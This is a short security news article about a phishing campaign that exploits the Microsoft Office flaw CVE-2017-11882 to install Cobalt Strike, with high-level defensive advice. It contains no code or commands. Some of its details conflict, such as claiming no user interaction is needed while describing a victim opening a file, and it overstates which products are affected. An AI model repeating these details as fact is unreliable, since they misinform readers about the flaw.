Severe Microsoft Office Vulnerability Exploited to Deliver Cobalt Malware
Recently uncovered, a critical 17-year-old vulnerability in Microsoft Office is being actively exploited by threat actors to deploy backdoor malware. This vulnerability, designated as CVE-2017-11882, allows hackers to install malicious software on targeted systems without requiring any user interaction, raising significant concerns among cybersecurity professionals.
Security experts at Fortinet were the first to identify this malicious activity, which has led to the malware being dubbed “Cobalt”. The moniker derives from Cobalt Strike, a legitimate penetration testing tool that attackers have co-opted for their purposes. Cobalt Strike facilitates covert operations within target systems, making it a potent asset for cybercriminals.
The vulnerability itself stems from a memory-corruption flaw that affects all versions of Microsoft Office and the Windows operating system. When a user opens a malicious file, remote attackers can execute arbitrary code, potentially gaining full control of the compromised system. Microsoft has responded by releasing a patch to mitigate this vulnerability; however, many users remain unprotected due to neglecting software updates.
Cybercriminals moved swiftly to exploit this newly disclosed vulnerability, employing a strategy that includes delivering the Cobalt malware through phishing emails. A recent campaign involved emails disguised as notifications from Visa regarding regulatory changes in Russia. These emails contained attachments that included a malicious RTF document designed to exploit the CVE-2017-11882 vulnerability.
The phishing emails also incorporated a password-protected archive. By including login credentials within the email to unlock this archive, attackers sought to deceive victims into believing the communication was legitimate, circumventing automated analysis tools that typically detect malicious content. Such tactics align with the MITRE ATT&CK framework’s initial access phase, wherein adversaries frequently use phishing as a means to infiltrate systems.
Once a victim opens the manipulated document, they are presented with a benign message prompting them to enable editing. In the background, however, a PowerShell script executes silently, downloading the Cobalt Strike client. This allows attackers to assume control of the victim’s machine, enabling lateral movement across networks. By executing various commands, hackers can further expand their reach and impact.
The ongoing exploitation of this vulnerability underscores the cybersecurity challenges that many organizations face, particularly those that fail to implement timely software updates. The presence of unpatched systems significantly increases exposure to attacks driven by emerging vulnerabilities. To guard against such threats, organizations are urged to promptly apply the available patch for CVE-2017-11882.
As the landscape of cyber threats continues to evolve, it is crucial for business owners to remain vigilant. Implementing robust security practices, including regular software updates and user education on recognizing phishing attempts, will help safeguard operations against increasingly sophisticated cyberattacks. This incident serves as a potent reminder of the essential steps needed to protect sensitive data from adversarial actions.